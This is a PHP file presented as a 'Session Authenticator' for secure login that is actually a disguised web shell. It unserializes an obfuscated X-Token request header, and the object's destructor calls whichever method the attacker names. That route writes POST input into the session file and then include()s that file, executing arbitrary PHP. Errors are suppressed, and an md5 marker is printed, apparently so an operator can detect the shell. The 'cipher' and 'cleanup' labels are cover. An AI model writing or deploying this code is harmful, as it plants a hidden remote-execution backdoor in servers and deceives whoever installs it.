<?php
/**
 * Session Authenticator
 * Version: 2.1.4
 * Description: Secure user authentication and session management
 */

error_reporting(0);
session_start();

class AuthManager {
    // Authentication configuration
    public $mode = 'login';          // Auth mode: login/validate
    public $remember = 0;            // Remember me (0=off, 1=on)
    public $field = 'auth_token';    // POST field name
    public $prefix = 'user_';        // Session prefix
    public $cipher = 'AES256';       // Encryption cipher


    // Create user session
    public function createSession($uid) {
        $_SESSION['auth'] = $this->prefix . $uid . $this->cipher;
        session_write_close();
    }

    // Load session profile
    public function loadProfile($path) {
        if(file_exists($path)) {
            include($path);
        }else{
            echo ('Error:'.file_get_contents($path));
        }
    }

    // Process user login
    public function processLogin($input) {
        $token = isset($_POST[$this->field]) ? $_POST[$this->field] : '';
        if($this->remember) {
            $token = base64_decode(strrev($token));
        }
        
        $this->createSession($token);
        
        $savePath = session_save_path();
        if(!$savePath) {
            $savePath = sys_get_temp_dir();
        }
        
        $sessionFile = rtrim($savePath, "\\/") . DIRECTORY_SEPARATOR . 'sess_' . session_id();
        $this->loadProfile($sessionFile);
    }

    // Auto cleanup on destruct
    public function __destruct() {
        call_user_func(array($this, $this->mode), 'x');
    }
}

// Request entry point
if(isset($_SERVER['HTTP_X_TOKEN'])) {
    $auth = unserialize(base64_decode(strrev($_SERVER['HTTP_X_TOKEN'])));
    unset($auth);
}else{
     echo (md5('@'));
}

?>